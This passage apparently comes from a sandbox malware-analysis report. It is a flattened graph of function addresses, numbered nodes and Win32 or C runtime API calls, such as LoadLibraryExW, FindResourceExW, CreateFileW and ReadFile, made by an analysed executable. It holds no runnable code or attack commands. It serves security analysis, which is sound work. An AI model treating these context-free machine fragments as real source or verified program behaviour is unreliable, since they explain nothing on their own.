calls 98616->98620 98617 f07f41 59 API calls 98618 f0381a 98617->98618 98923 f08620 98618->98923 98622 f3d3fe 98620->98622 98621 f0382c Mailbox 98623 f07f41 59 API calls 98621->98623 98625 f03ee2 59 API calls 98622->98625 98624 f03852 98623->98624 98627 f08620 69 API calls 98624->98627 98626 f3d41a 98625->98626 98628 f04864 61 API calls 98626->98628 98630 f03861 Mailbox 98627->98630 98629 f3d43f 98628->98629 98631 f03ee2 59 API calls 98629->98631 98633 f077c7 59 API calls 98630->98633 98632 f3d44b 98631->98632 98634 f081a7 59 API calls 98632->98634 98635 f0387f 98633->98635 98636 f3d459 98634->98636 98927 f03ee2 98635->98927 98638 f03ee2 59 API calls 98636->98638 98640 f3d468 98638->98640 98647 f081a7 59 API calls 98640->98647 98642 f03899 98642->98616 98643 f038a3 98642->98643 98644 f2313d _W_store_winword 60 API calls 98643->98644 98645 f038ae 98644->98645 98645->98622 98646 f038b8 98645->98646 98649 f2313d _W_store_winword 60 API calls 98646->98649 98648 f3d48a 98647->98648 98650 f03ee2 59 API calls 98648->98650 98651 f038c3 98649->98651 98652 f3d497 98650->98652 98651->98626 98653 f038cd 98651->98653 98652->98652 98654 f2313d _W_store_winword 60 API calls 98653->98654 98655 f038d8 98654->98655 98655->98640 98656 f03919 98655->98656 98658 f03ee2 59 API calls 98655->98658 98656->98640 98657 f03926 98656->98657 98943 f0942e 98657->98943 98660 f038fc 98658->98660 98662 f081a7 59 API calls 98660->98662 98664 f0390a 98662->98664 98666 f03ee2 59 API calls 98664->98666 98666->98656 98668 f093ea 59 API calls 98670 f03961 98668->98670 98669 f09040 60 API calls 98669->98670 98670->98668 98670->98669 98671 f03ee2 59 API calls 98670->98671 98672 f039a7 Mailbox 98670->98672 98671->98670 98672->98537 98674 f073f2 __ftell_nolock 98673->98674 98675 f3ee4b _memset 98674->98675 98676 f0740b 98674->98676 98679 f3ee67 75D3D0D0 98675->98679 99758 f048ae 98676->99758 98681 f3eeb6 98679->98681 98683 f07d2c 59 API calls 98681->98683 98685 f3eecb 98683->98685 98685->98685 98686 f07429 99786 f069ca 98686->99786 98690 f07da5 98689->98690 98692 f07d38 __wsetenvp 98689->98692 98691 f07e8c 59 API calls 98690->98691 98697 f07d56 _memmove 98691->98697 98693 f07d73 98692->98693 98694 f07d4e 98692->98694 98695 f08189 59 API calls 98693->98695 100122 f08087 59 API calls Mailbox 98694->100122 98695->98697 98697->98551 98699 f10a9a __ftell_nolock 98698->98699 100123 f06ee0 98699->100123 98701 f10a9f 98702 f03c26 98701->98702 100134 f112fe 89 API calls 98701->100134 98702->98547 98702->98555 98704 f10aac 98704->98702 100135 f14047 91 API calls Mailbox 98704->100135 98706 f10ab5 98706->98702 98707 f10ab9 GetFullPathNameW 98706->98707 98708 f07d2c 59 API calls 98707->98708 98709 f10ae5 98708->98709 98710 f07d2c 59 API calls 98709->98710 98711 f10af2 98710->98711 98712 f450d5 _wcscat 98711->98712 98713 f07d2c 59 API calls 98711->98713 98713->98702 98715 f03ac2 LoadImageW RegisterClassExW 98714->98715 98716 f3d49c 98714->98716 100173 f03041 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 98715->100173 100177 f048fe LoadImageW EnumResourceNamesW 98716->100177 98720 f3d4a5 98721 f039e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98721->98562 98723 f04406 _memset 98722->98723 100178 f04213 98723->100178 98811->98547 98812->98560 98814 f31b90 __ftell_nolock 98813->98814 98815 f04871 GetModuleFileNameW 98814->98815 98816 f07f41 59 API calls 98815->98816 98817 f04897 98816->98817 98818 f048ae 60 API calls 98817->98818 98819 f048a1 Mailbox 98818->98819 98819->98566 98843 f20ffe 98840->98843 98842 f21018 98842->98589 98843->98842 98845 f2101c std::exception::exception 98843->98845 98850 f2594c 98843->98850 98867 f235e1 RtlDecodePointer 98843->98867 98868 f287db RaiseException 98845->98868 98847 f21046 98869 f28711 58 API calls _free 98847->98869 98849 f21058 98849->98589 98851 f259c7 98850->98851 98861 f25958 98850->98861 98876 f235e1 RtlDecodePointer 98851->98876 98853 f259cd 98877 f28d68 58 API calls __getptd_noexit 98853->98877 98854 f25963 98854->98861 98870 f2a3ab 58 API calls 2 library calls 98854->98870 98871 f2a408 58 API calls 7 library calls 98854->98871 98872 f232df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98854->98872 98857 f2598b RtlAllocateHeap 98858 f259bf 98857->98858 98857->98861 98858->98843 98860 f259b3 98874 f28d68 58 API calls __getptd_noexit 98860->98874 98861->98854 98861->98857 98861->98860 98865 f259b1 98861->98865 98873 f235e1 RtlDecodePointer 98861->98873 98875 f28d68 58 API calls __getptd_noexit 98865->98875 98867->98843 98868->98847 98869->98849 98870->98854 98871->98854 98873->98861 98874->98865 98875->98858 98876->98853 98877->98858 98879 f03d50 __ftell_nolock 98878->98879 98880 f07d2c 59 API calls 98879->98880 98886 f03eb6 Mailbox 98879->98886 98882 f03d82 98880->98882 98891 f03db8 Mailbox 98882->98891 99004 f07b52 98882->99004 98883 f07b52 59 API calls 98883->98891 98884 f03e89 98885 f07f41 59 API calls 98884->98885 98884->98886 98888 f03eaa 98885->98888 98886->98596 98887 f07f41 59 API calls 98887->98891 98889 f03f84 59 API calls 98888->98889 98889->98886 98891->98883 98891->98884 98891->98886 98891->98887 99007 f03f84 98891->99007 99017 f04d13 98892->99017 98897 f04f68 LoadLibraryExW 99027 f04cc8 98897->99027 98898 f3dd0f 98900 f04faa 84 API calls 98898->98900 98902 f3dd16 98900->98902 98904 f04cc8 3 API calls 98902->98904 98906 f3dd1e 98904->98906 98905 f04f8f 98905->98906 98907 f04f9b 98905->98907 99053 f0506b 98906->99053 98909 f04faa 84 API calls 98907->98909 98911 f037e6 98909->98911 98911->98603 98911->98604 98913 f3dd45 99061 f05027 98913->99061 98915 f3dd52 98917 f081b2 98916->98917 98918 f03801 98916->98918 99491 f080d7 59 API calls 2 library calls 98917->99491 98920 f093ea 98918->98920 98921 f20ff6 Mailbox 59 API calls 98920->98921 98922 f0380d 98921->98922 98922->98617 98924 f0862b 98923->98924 98926 f08652 98924->98926 99492 f08b13 69 API calls Mailbox 98924->99492 98926->98621 98928 f03f05 98927->98928 98929 f03eec 98927->98929 98931 f07d2c 59 API calls 98928->98931 98930 f081a7 59 API calls 98929->98930 98932 f0388b 98930->98932 98931->98932 98933 f2313d 98932->98933 98934 f23149 98933->98934 98935 f231be 98933->98935 98942 f2316e 98934->98942 99493 f28d68 58 API calls __getptd_noexit 98934->99493 99495 f231d0 60 API calls 4 library calls 98935->99495 98938 f231cb 98938->98642 98939 f23155 99494 f28ff6 9 API calls __Wcsftime_l 98939->99494 98941 f23160 98941->98642 98942->98642 98944 f09436 98943->98944 98945 f20ff6 Mailbox 59 API calls 98944->98945 98946 f09444 98945->98946 98947 f03936 98946->98947 99496 f0935c 59 API calls Mailbox 98946->99496 98949 f091b0 98947->98949 99497 f092c0 98949->99497 98951 f091bf 98952 f20ff6 Mailbox 59 API calls 98951->98952 98953 f03944 98951->98953 98952->98953 98954 f09040 98953->98954 98955 f3f5a5 98954->98955 98961 f09057 98954->98961 98955->98961 99507 f08d3b 59 API calls Mailbox 98955->99507 98957 f091a0 99506 f09e9c 60 API calls Mailbox 98957->99506 98958 f09158 98959 f20ff6 Mailbox 59 API calls 98958->98959 98962 f0915f 98959->98962 98961->98957 98961->98958 98961->98962 98962->98670 98964 f05045 85 API calls 98963->98964 98965 f69854 98964->98965 99508 f699be 98965->99508 98968 f0506b 74 API calls 98969 f69881 98968->98969 98970 f0506b 74 API calls 98969->98970 98971 f69891 98970->98971 98972 f0506b 74 API calls 98971->98972 98973 f698ac 98972->98973 98974 f0506b 74 API calls 98973->98974 98975 f698c7 98974->98975 98976 f05045 85 API calls 98975->98976 98977 f698de 98976->98977 98978 f2594c __crtCompareStringA_stat 58 API calls 98977->98978 98979 f698e5 98978->98979 98980 f2594c __crtCompareStringA_stat 58 API calls 98979->98980 98981 f698ef 98980->98981 98982 f0506b 74 API calls 98981->98982 98983 f69903 98982->98983 98984 f69393 GetSystemTimeAsFileTime 98983->98984 98985 f69916 98984->98985 98986 f69940 98985->98986 98987 f6992b 98985->98987 98989 f69946 98986->98989 98990 f699a5 98986->98990 98988 f22f95 _free 58 API calls 98987->98988 98992 f69931 98988->98992 99514 f68d90 98989->99514 98991 f22f95 _free 58 API calls 98990->98991 98997 f3d3c1 98991->98997 98994 f22f95 _free 58 API calls 98992->98994 98994->98997 98996 f22f95 _free 58 API calls 98996->98997 98997->98607 98998 f04faa 98997->98998 98999 f04fb4 98998->98999 99001 f04fbb 98998->99001 99000 f255d6 __fcloseall 83 API calls 98999->99000 99000->99001 99002 f04fca 99001->99002 99003 f04fdb FreeLibrary 99001->99003 99002->98607 99003->99002 99013 f07faf 99004->99013 99006 f07b5d 99006->98882 99008 f03fb4 _memmove 99007->99008 99009 f03f92 99007->99009 99010 f20ff6 Mailbox 59 API calls 99008->99010 99011 f20ff6 Mailbox 59 API calls 99009->99011 99012 f03fc8 99010->99012 99011->99008 99012->98891 99014 f07fc2 99013->99014 99015 f07fbf _memmove 99013->99015 99016 f20ff6 Mailbox 59 API calls 99014->99016 99015->99006 99016->99015 99066 f04d61 99017->99066 99020 f04d61 2 API calls 99023 f04d3a 99020->99023 99021 f04d53 99024 f2548b 99021->99024 99022 f04d4a FreeLibrary 99022->99021 99023->99021 99023->99022 99070 f254a0 99024->99070 99026 f04f5c 99026->98897 99026->98898 99227 f04d94 99027->99227 99030 f04ced 99032 f04d08 99030->99032 99033 f04cff FreeLibrary 99030->99033 99031 f04d94 2 API calls 99031->99030 99034 f04dd0 99032->99034 99033->99032 99035 f20ff6 Mailbox 59 API calls 99034->99035 99036 f04de5 99035->99036 99231 f0538e 99036->99231 99038 f04df1 _memmove 99039 f04e2c 99038->99039 99040 f04f21 99038->99040 99041 f04ee9 99038->99041 99042 f05027 69 API calls 99039->99042 99246 f69ba5 95 API calls 99040->99246 99234 f04fe9 99041->99234 99049 f04e35 99042->99049 99045 f0506b 74 API calls 99045->99049 99046 f04ec9 99046->98905 99048 f3dcd0 99050 f05045 85 API calls 99048->99050 99049->99045 99049->99046 99049->99048 99241 f05045 99049->99241 99051 f3dce4 99050->99051 99052 f0506b 74 API calls 99051->99052 99052->99046 99054 f3ddf6 99053->99054 99055 f0507d 99053->99055 99270 f25812 99055->99270 99058 f69393 99468 f691e9 99058->99468 99060 f693a9 99060->98913 99062 f05036 99061->99062 99063 f3ddb9 99061->99063 99473 f25e90 99062->99473 99065 f0503e 99065->98915 99067 f04d2e 99066->99067 99068 f04d6a LoadLibraryA 99066->99068 99067->99020 99067->99023 99068->99067 99069 f04d7b GetProcAddress 99068->99069 99069->99067 99071 f254ac __setmode 99070->99071 99072 f254bf 99071->99072 99074 f254f0 99071->99074 99119 f28d68 58 API calls __getptd_noexit 99072->99119 99089 f30738 99074->99089 99075 f254c4 99120 f28ff6 9 API calls __Wcsftime_l 99075->99120 99078 f254f5 99079 f2550b 99078->99079 99080 f254fe 99078->99080 99082 f25535 99079->99082 99083 f25515 99079->99083 99121 f28d68 58 API calls __getptd_noexit 99080->99121 99104 f30857 99082->99104 99122 f28d68 58 API calls __getptd_noexit 99083->99122 99085 f254cf @_EH4_CallFilterFunc@8 __setmode 99085->99026 99090 f30744 __setmode 99089->99090 99091 f29e4b __lock 58 API calls 99090->99091 99092 f30752 99091->99092 99093 f307cd 99092->99093 99099 f29ed3 __mtinitlocknum 58 API calls 99092->99099 99102 f307c6 99092->99102 99127 f26e8d 59 API calls __lock 99092->99127 99128 f26ef7 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 99092->99128 99129 f28a5d 58 API calls 2 library calls 99093->99129 99096 f307d4 99096->99102 99130 f2a06b InitializeCriticalSectionAndSpinCount 99096->99130 99097 f30843 __setmode 99097->99078 99099->99092 99101 f307fa RtlEnterCriticalSection 99101->99102 99124 f3084e 99102->99124 99112 f30877 __wopenfile 99104->99112 99105 f30891 99135 f28d68 58 API calls __getptd_noexit 99105->99135 99107 f30896 99136 f28ff6 9 API calls __Wcsftime_l 99107->99136 99109 f25540 99123 f25562 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 99109->99123 99110 f30aaf 99132 f387f1 99110->99132 99112->99105 99115 f30a4c 99112->99115 99137 f23a0b 60 API calls 3 library calls 99112->99137 99114 f30a45 99114->99115 99138 f23a0b 60 API calls 3 library calls 99114->99138 99115->99105 99115->99110 99117 f30a64 99117->99115 99139 f23a0b 60 API calls 3 library calls 99117->99139 99119->99075 99120->99085 99121->99085 99122->99085 99123->99085 99131 f29fb5 RtlLeaveCriticalSection 99124->99131 99126 f30855 99126->99097 99127->99092 99128->99092 99129->99096 99130->99101 99131->99126 99140 f37fd5 99132->99140 99134 f3880a 99134->99109 99135->99107 99136->99109 99137->99114 99138->99117 99139->99115 99141 f37fe1 __setmode 99140->99141 99142 f37ff7 99141->99142 99145 f3802d 99141->99145 99224 f28d68 58 API calls __getptd_noexit 99142->99224 99144 f37ffc 99225 f28ff6 9 API calls __Wcsftime_l 99144->99225 99151 f3809e 99145->99151 99148 f38049 99226 f38072 RtlLeaveCriticalSection __unlock_fhandle 99148->99226 99150 f38006 __setmode 99150->99134 99152 f380be 99151->99152 99153 f2471a __wsopen_nolock 58 API calls 99152->99153 99156 f380da 99153->99156 99154 f29006 __invoke_watson 8 API calls 99155 f387f0 99154->99155 99158 f37fd5 __wsopen_helper 103 API calls 99155->99158 99157 f38114 99156->99157 99164 f38137 99156->99164 99223 f38211 99156->99223 99160 f28d34 __commit 58 API calls 99157->99160 99159 f3880a 99158->99159 99159->99148 99161 f38119 99160->99161 99162 f28d68 __lseeki64_nolock 58 API calls 99161->99162 99163 f38126 99162->99163 99166 f28ff6 __Wcsftime_l 9 API calls 99163->99166 99165 f381f5 99164->99165 99173 f381d3 99164->99173 99167 f28d34 __commit 58 API calls 99165->99167 99168 f38130 99166->99168 99169 f381fa 99167->99169 99168->99148 99170 f28d68 __lseeki64_nolock 58 API calls 99169->99170 99171 f38207 99170->99171 99172 f28ff6 __Wcsftime_l 9 API calls 99171->99172 99172->99223 99174 f2d4d4 __alloc_osfhnd 61 API calls 99173->99174 99175 f382a1 99174->99175 99176 f382ab 99175->99176 99177 f382ce 99175->99177 99179 f28d34 __commit 58 API calls 99176->99179 99178 f37f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99177->99178 99188 f382f0 99178->99188 99180 f382b0 99179->99180 99182 f28d68 __lseeki64_nolock 58 API calls 99180->99182 99181 f3836e GetFileType 99183 f383bb 99181->99183 99184 f38379 GetLastError 99181->99184 99186 f382ba 99182->99186 99196 f2d76a __set_osfhnd 59 API calls 99183->99196 99187 f28d47 __dosmaperr 58 API calls 99184->99187 99185 f3833c GetLastError 99189 f28d47 __dosmaperr 58 API calls 99185->99189 99190 f28d68 __lseeki64_nolock 58 API calls 99186->99190 99191 f383a0 CloseHandle 99187->99191 99188->99181 99188->99185 99192 f37f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99188->99192 99193 f38361 99189->99193 99190->99168 99191->99193 99194 f383ae 99191->99194 99195 f38331 99192->99195 99198 f28d68 __lseeki64_nolock 58 API calls 99193->99198 99197 f28d68 __lseeki64_nolock 58 API calls 99194->99197 99195->99181 99195->99185 99200 f383d9 99196->99200 99199 f383b3 99197->99199 99198->99223 99199->99193 99201 f31b11 __lseeki64_nolock 60 API calls 99200->99201 99202 f38594 99200->99202 99206 f3845a 99200->99206 99203 f38443 99201->99203 99204 f38767 CloseHandle 99202->99204 99202->99223 99203->99206 99208 f28d34 __commit 58 API calls 99203->99208 99205 f37f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99204->99205 99207 f3878e 99205->99207 99206->99202 99209 f310ab 70 API calls __read_nolock 99206->99209 99214 f30d2d __close_nolock 61 API calls 99206->99214 99216 f399f2 __chsize_nolock 82 API calls 99206->99216 99217 f2dac6 __write 78 API calls 99206->99217 99218 f38611 99206->99218 99219 f31b11 60 API calls __lseeki64_nolock 99206->99219 99210 f38796 GetLastError 99207->99210 99211 f387c2 99207->99211 99208->99206 99209->99206 99212 f28d47 __dosmaperr 58 API calls 99210->99212 99211->99223 99213 f387a2 99212->99213 99215 f2d67d __free_osfhnd 59 API calls 99213->99215 99214->99206 99215->99211 99216->99206 99217->99206 99220 f30d2d __close_nolock 61 API calls 99218->99220 99219->99206 99221 f38618 99220->99221 99222 f28d68 __lseeki64_nolock 58 API calls 99221->99222 99222->99223 99223->99154 99224->99144 99225->99150 99226->99150 99228 f04ce1 99227->99228 99229 f04d9d LoadLibraryA 99227->99229 99228->99030 99228->99031 99229->99228 99230 f04dae GetProcAddress 99229->99230 99230->99228 99232 f20ff6 Mailbox 59 API calls 99231->99232 99233 f053a0 99232->99233 99233->99038 99235 f04fff 99234->99235 99236 f05003 FindResourceExW 99235->99236 99240 f05020 99235->99240 99237 f3dd5c LoadResource 99236->99237 99236->99240 99238 f3dd71 SizeofResource 99237->99238 99237->99240 99239 f3dd85 LockResource 99238->99239 99238->99240 99239->99240 99240->99039 99242 f05054 99241->99242 99243 f3ddd4 99241->99243 99247 f25a7d 99242->99247 99245 f05062 99245->99049 99246->99039 99248 f25a89 __setmode 99247->99248 99249 f25a9b 99248->99249 99251 f25ac1 99248->99251 99260 f28d68 58 API calls __getptd_noexit 99249->99260 99262 f26e4e 99251->99262 99252 f25aa0 99261 f28ff6 9 API calls __Wcsftime_l 99252->99261 99255 f25ac7 99268 f259ee 83 API calls 5 library calls 99255->99268 99257 f25ad6 99269 f25af8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 99257->99269 99259 f25aab __setmode 99259->99245 99260->99252 99261->99259 99263 f26e80 RtlEnterCriticalSection 99262->99263 99264 f26e5e 99262->99264 99266 f26e76 99263->99266 99264->99263 99265 f26e66 99264->99265 99267 f29e4b __lock 58 API calls 99265->99267 99266->99255 99267->99266 99268->99257 99269->99259 99273 f2582d 99270->99273 99272 f0508e 99272->99058 99274 f25839 __setmode 99273->99274 99275 f2584f _memset 99274->99275 99276 f2587c 99274->99276 99277 f25874 __setmode 99274->99277 99300 f28d68 58 API calls __getptd_noexit 99275->99300 99278 f26e4e __lock_file 59 API calls 99276->99278 99277->99272 99279 f25882 99278->99279 99286 f2564d 99279->99286 99282 f25869 99301 f28ff6 9 API calls __Wcsftime_l 99282->99301 99290 f25668 _memset 99286->99290 99293 f25683 99286->99293 99287 f25673 99398 f28d68 58 API calls __getptd_noexit 99287->99398 99289 f25678 99399 f28ff6 9 API calls __Wcsftime_l 99289->99399 99290->99287 99290->99293 99297 f256c3 99290->99297 99302 f258b6 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 99293->99302 99294 f257d4 _memset 99401 f28d68 58 API calls __getptd_noexit 99294->99401 99297->99293 99297->99294 99303 f24916 99297->99303 99310 f310ab 99297->99310 99378 f30df7 99297->99378 99400 f30f18 58 API calls 4 library calls 99297->99400 99300->99282 99301->99277 99302->99277 99304 f24920 99303->99304 99305 f24935 99303->99305 99402 f28d68 58 API calls __getptd_noexit 99304->99402 99305->99297 99307 f24925 99403 f28ff6 9 API calls __Wcsftime_l 99307->99403 99309 f24930 99309->99297 99311 f310e3 99310->99311 99312 f310cc 99310->99312 99313 f3181b 99311->99313 99317 f3111d 99311->99317 99413 f28d34 58 API calls __getptd_noexit 99312->99413 99429 f28d34 58 API calls __getptd_noexit 99313->99429 99316 f310d1 99414 f28d68 58 API calls __getptd_noexit 99316->99414 99320 f31125 99317->99320 99327 f3113c 99317->99327 99318 f31820 99430 f28d68 58 API calls __getptd_noexit 99318->99430 99415 f28d34 58 API calls __getptd_noexit 99320->99415 99323 f31131 99431 f28ff6 9 API calls __Wcsftime_l 99323->99431 99324 f3112a 99416 f28d68 58 API calls __getptd_noexit 99324->99416 99326 f31151 99417 f28d34 58 API calls __getptd_noexit 99326->99417 99327->99326 99328 f3116b 99327->99328 99331 f31189 99327->99331 99358 f310d8 99327->99358 99328->99326 99333 f31176 99328->99333 99418 f28a5d 58 API calls 2 library calls 99331->99418 99404 f35ebb 99333->99404 99334 f31199 99336 f311a1 99334->99336 99337 f311bc 99334->99337 99419 f28d68 58 API calls __getptd_noexit 99336->99419 99421 f31b11 60 API calls 2 library calls 99337->99421 99338 f3128a 99341 f31303 ReadFile 99338->99341 99342 f312a0 GetConsoleMode 99338->99342 99344 f317e3 GetLastError 99341->99344 99345 f31325 99341->99345 99346 f31300 99342->99346 99347 f312b4 99342->99347 99343 f311a6 99420 f28d34 58 API calls __getptd_noexit 99343->99420 99349 f317f0 99344->99349 99350 f312e3 99344->99350 99345->99344 99353 f312f5 99345->99353 99346->99341 99347->99346 99351 f312ba ReadConsoleW 99347->99351 99427 f28d68 58 API calls __getptd_noexit 99349->99427 99362 f312e9 99350->99362 99422 f28d47 58 API calls 3 library calls 99350->99422 99351->99353 99354 f312dd GetLastError 99351->99354 99360 f3135a 99353->99360 99361 f315c7 99353->99361 99353->99362 99354->99350 99356 f317f5 99428 f28d34 58 API calls __getptd_noexit 99356->99428 99358->99297 99359 f22f95 _free 58 API calls 99359->99358 99364 f313c6 ReadFile 99360->99364 99371 f31447 99360->99371 99361->99362 99365 f316cd ReadFile 99361->99365 99362->99358 99362->99359 99366 f313e7 GetLastError 99364->99366 99377 f313f1 99364->99377 99370 f316f0 GetLastError 99365->99370 99376 f316fe 99365->99376 99366->99377 99367 f314f4 99424 f28d68 58 API calls __getptd_noexit 99367->99424 99369 f31504 99372 f314b4 MultiByteToWideChar 99369->99372 99425 f31b11 60 API calls 2 library calls 99369->99425 99370->99376 99371->99362 99371->99367 99371->99369 99371->99372 99372->99354 99372->99362 99376->99361 99426 f31b11 60 API calls 2 library calls 99376->99426 99377->99360 99423 f31b11 60 API calls 2 library calls 99377->99423 99379 f30e02 99378->99379 99380 f30e17 99378->99380 99465 f28d68 58 API calls __getptd_noexit 99379->99465 99384 f30e4c 99380->99384 99389 f30e12 99380->99389 99467 f36234 58 API calls __malloc_crt 99380->99467 99382 f30e07 99466 f28ff6 9 API calls __Wcsftime_l 99382->99466 99386 f24916 __fclose_nolock 58 API calls 99384->99386 99387 f30e60 99386->99387 99432 f30f97 99387->99432 99389->99297 99390 f30e67 99390->99389 99391 f24916 __fclose_nolock 58 API calls 99390->99391 99392 f30e8a 99391->99392 99392->99389 99393 f24916 __fclose_nolock 58 API calls 99392->99393 99394 f30e96 99393->99394 99394->99389 99395 f24916 __fclose_nolock 58 API calls 99394->99395 99396 f30ea3 99395->99396 99397 f24916 __fclose_nolock 58 API calls 99396->99397 99397->99389 99398->99289 99399->99293 99400->99297 99401->99289 99402->99307 99403->99309 99405 f35ed3 99404->99405 99406 f35ec6 99404->99406 99408 f35edf 99405->99408 99409 f28d68 __lseeki64_nolock 58 API calls 99405->99409 99407 f28d68 __lseeki64_nolock 58 API calls 99406->99407 99410 f35ecb 99407->99410 99408->99338 99411 f35f00 99409->99411 99410->99338 99412 f28ff6 __Wcsftime_l 9 API calls 99411->99412 99412->99410 99413->99316 99414->99358 99415->99324 99416->99323 99417->99324 99418->99334 99419->99343 99420->99358 99421->99333 99422->99362 99423->99377 99424->99362 99425->99372 99426->99376 99427->99356 99428->99362 99429->99318 99430->99323 99431->99358 99433 f30fa3 __setmode 99432->99433 99434 f30fb0 99433->99434 99435 f30fc7 99433->99435 99436 f28d34 __commit 58 API calls 99434->99436 99437 f3108b 99435->99437 99440 f30fdb 99435->99440 99439 f30fb5 99436->99439 99438 f28d34 __commit 58 API calls 99437->99438 99441 f30ffe 99438->99441 99442 f28d68 __lseeki64_nolock 58 API calls 99439->99442 99443 f31006 99440->99443 99444 f30ff9 99440->99444 99449 f28d68 __lseeki64_nolock 58 API calls 99441->99449 99456 f30fbc __setmode 99442->99456 99446 f31013 99443->99446 99447 f31028 99443->99447 99445 f28d34 __commit 58 API calls 99444->99445 99445->99441 99450 f28d34 __commit 58 API calls 99446->99450 99448 f2d446 ___lock_fhandle 59 API calls 99447->99448 99451 f3102e 99448->99451 99452 f31020 99449->99452 99453 f31018 99450->99453 99454 f31041 99451->99454 99455 f31054 99451->99455 99459 f28ff6 __Wcsftime_l 9 API calls 99452->99459 99457 f28d68 __lseeki64_nolock 58 API calls 99453->99457 99458 f310ab __read_nolock 70 API calls 99454->99458 99460 f28d68 __lseeki64_nolock 58 API calls 99455->99460 99456->99390 99457->99452 99461 f3104d 99458->99461 99459->99456 99462 f31059 99460->99462 99464 f31083 __read RtlLeaveCriticalSection 99461->99464 99463 f28d34 __commit 58 API calls 99462->99463 99463->99461 99464->99456 99465->99382 99466->99389 99467->99384 99471 f2543a GetSystemTimeAsFileTime 99468->99471 99470 f691f8 99470->99060 99472 f25468 __aulldiv 99471->99472 99472->99470 99474 f25e9c __setmode 99473->99474 99475 f25ec3 99474->99475 99476 f25eae 99474->99476 99478 f26e4e __lock_file 59 API calls 99475->99478 99487 f28d68 58 API calls __getptd_noexit 99476->99487 99480 f25ec9 99478->99480 99479 f25eb3 99488 f28ff6 9 API calls __Wcsftime_l 99479->99488 99489 f25b00 67 API calls 7 library calls 99480->99489 99483 f25ed4 99490 f25ef4 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 99483->99490 99485 f25ee6 99486 f25ebe __setmode 99485->99486 99486->99065 99487->99479 99488->99486 99489->99483 99490->99485 99491->98918 99492->98926 99493->98939 99494->98941 99495->98938 99496->98947 99498 f092c9 Mailbox 99497->99498 99499 f3f5c8 99498->99499 99504 f092d3 99498->99504 99500 f20ff6 Mailbox 59 API calls 99499->99500 99502 f3f5d4 99500->99502 99501 f092da 99501->98951 99504->99501 99505 f09df0 59 API calls Mailbox 99504->99505 99505->99504 99506->98962 99507->98961 99509 f699d2 __tzset_nolock _wcscmp 99508->99509 99510 f69866 99509->99510 99511 f0506b 74 API calls 99509->99511 99512 f69393 GetSystemTimeAsFileTime 99509->99512 99513 f05045 85 API calls 99509->99513 99510->98968 99510->98997 99511->99509 99512->99509 99513->99509 99515 f68da9 99514->99515 99516 f68d9b 99514->99516 99518 f68dee 99515->99518 99519 f2548b 115 API calls 99515->99519 99540 f68db2 99515->99540 99517 f2548b 115 API calls 99516->99517 99517->99515 99545 f6901b 99518->99545 99521 f68dd3 99519->99521 99521->99518 99523 f68ddc 99521->99523 99522 f68e32 99524 f68e36 99522->99524 99525 f68e57 99522->99525 99528 f255d6 __fcloseall 83 API calls 99523->99528 99523->99540 99527 f68e43 99524->99527 99530 f255d6 __fcloseall 83 API calls 99524->99530 99549 f68c33 99525->99549 99533 f255d6 __fcloseall 83 API calls 99527->99533 99527->99540 99528->99540 99530->99527 99531 f68e85 99558 f68eb5 99531->99558 99532 f68e65 99534 f68e72 99532->99534 99536 f255d6 __fcloseall 83 API calls 99532->99536 99533->99540 99538 f255d6 __fcloseall 83 API calls 99534->99538 99534->99540 99536->99534 99538->99540 99540->98996 99542 f68ea0 99542->99540 99544 f255d6 __fcloseall 83 API calls 99542->99544 99544->99540 99546 f69040 99545->99546 99547 f69029 __tzset_nolock _memmove 99545->99547 99548 f25812 __fread_nolock 74 API calls 99546->99548 99547->99522 99548->99547 99550 f2594c __crtCompareStringA_stat 58 API calls 99549->99550 99551 f68c42 99550->99551 99552 f2594c __crtCompareStringA_stat 58 API calls 99551->99552 99553 f68c56 99552->99553 99554 f2594c __crtCompareStringA_stat 58 API calls 99553->99554 99555 f68c6a 99554->99555 99556 f68f97 58 API calls 99555->99556 99557 f68c7d 99555->99557 99556->99557 99557->99531 99557->99532 99562 f68eca 99558->99562 99559 f68f82 99587 f691bf 99559->99587 99561 f68c8f 74 API calls 99561->99562 99562->99559 99562->99561 99565 f68e8c 99562->99565 99591 f68d2b 74 API calls 99562->99591 99592 f6909c 80 API calls 99562->99592 99566 f68f97 99565->99566 99567 f68fa4 99566->99567 99568 f68faa 99566->99568 99569 f22f95 _free 58 API calls 99567->99569 99570 f68fbb 99568->99570 99571 f22f95 _free 58 API calls 99568->99571 99569->99568 99572 f68e93 99570->99572 99573 f22f95 _free 58 API calls 99570->99573 99571->99570 99572->99542 99574 f255d6 99572->99574 99573->99572 99575 f255e2 __setmode 99574->99575 99576 f255f6 99575->99576 99577 f2560e 99575->99577 99674 f28d68 58 API calls __getptd_noexit 99576->99674 99579 f26e4e __lock_file 59 API calls 99577->99579 99586 f25606 __setmode 99577->99586 99581 f25620 99579->99581 99580 f255fb 99675 f28ff6 9 API calls __Wcsftime_l 99580->99675 99658 f2556a 99581->99658 99586->99542 99588 f691cc 99587->99588 99590 f691dd 99587->99590 99593 f24a93 99588->99593 99590->99565 99591->99562 99592->99562 99594 f24a9f __setmode 99593->99594 99595 f24acd __setmode 99594->99595 99596 f24ad5 99594->99596 99597 f24abd 99594->99597 99595->99590 99598 f26e4e __lock_file 59 API calls 99596->99598 99618 f28d68 58 API calls __getptd_noexit 99597->99618 99600 f24adb 99598->99600 99606 f2493a 99600->99606 99601 f24ac2 99619 f28ff6 9 API calls __Wcsftime_l 99601->99619 99609 f24949 99606->99609 99612 f24967 99606->99612 99607 f24957 99649 f28d68 58 API calls __getptd_noexit 99607->99649 99609->99607 99609->99612 99616 f24981 _memmove 99609->99616 99610 f2495c 99650 f28ff6 9 API calls __Wcsftime_l 99610->99650 99620 f24b0d RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 99612->99620 99615 f24916 __fclose_nolock 58 API calls 99615->99616 99616->99612 99616->99615 99621 f2dac6 99616->99621 99651 f24c6d 99616->99651 99657 f2b05e 78 API calls 7 library calls 99616->99657 99618->99601 99619->99595 99620->99595 99622 f2dad2 __setmode 99621->99622 99623 f2daf6 99622->99623 